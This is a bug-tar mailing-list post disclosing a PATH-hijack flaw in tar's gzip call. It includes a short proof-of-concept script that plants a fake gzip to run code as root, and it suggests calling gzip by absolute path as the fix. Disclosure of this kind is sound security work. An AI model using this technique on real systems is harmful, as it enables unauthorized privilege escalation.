Path Hijack vulnerability

bug-tar

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Path Hijack vulnerability

From:	Gregorio Giacobbe
Subject:	Path Hijack vulnerability
Date:	Wed, 3 Nov 2021 15:21:43 +0100

Hi!

As per subject, I discovered a Path Hijack vulnerabilty in the tar binary. When 
using the -z switch for gzip compression/decompression the binary calls “gzip” 
without absolute path, hence allowing the path Hijack. 
While this, in a normal scenario can be totally harmless, it can be used as a 
privileged escalation technique when the tar binary is called as root user.

Following lines will provide a basic PoC:
----
export PATH=$(pwd):$PATH
echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
chmod +x gzip
touch file.txt
tar -zcf backup.tar.gz file.txt
ls -la /tmp/tarred 
-rw-r--r-- 1 root root 0 Nov  3 14:05 /tmp/tarred
----

I have not tested switches for other compression/decompression formats, so 
there is a chance that they can be used as well as gzip.

The remediation would be to make sure that tar calls gzip by its absolute path.

Best Regards, 
Gregorio Giacobbe

[Prev in Thread]

Current Thread

[Next in Thread]

Path Hijack vulnerability, Gregorio Giacobbe <=
- Re: Path Hijack vulnerability, Michał Górny, 2021/11/03
- Re: Path Hijack vulnerability, Paul Eggert, 2021/11/03
  - Re: Path Hijack vulnerability, Richard Purdie, 2021/11/03
- Re: Path Hijack vulnerability, Mike Frysinger, 2021/11/04

Next by Date: Re: Path Hijack vulnerability
Next by thread: Re: Path Hijack vulnerability
Index(es):
- Date
- Thread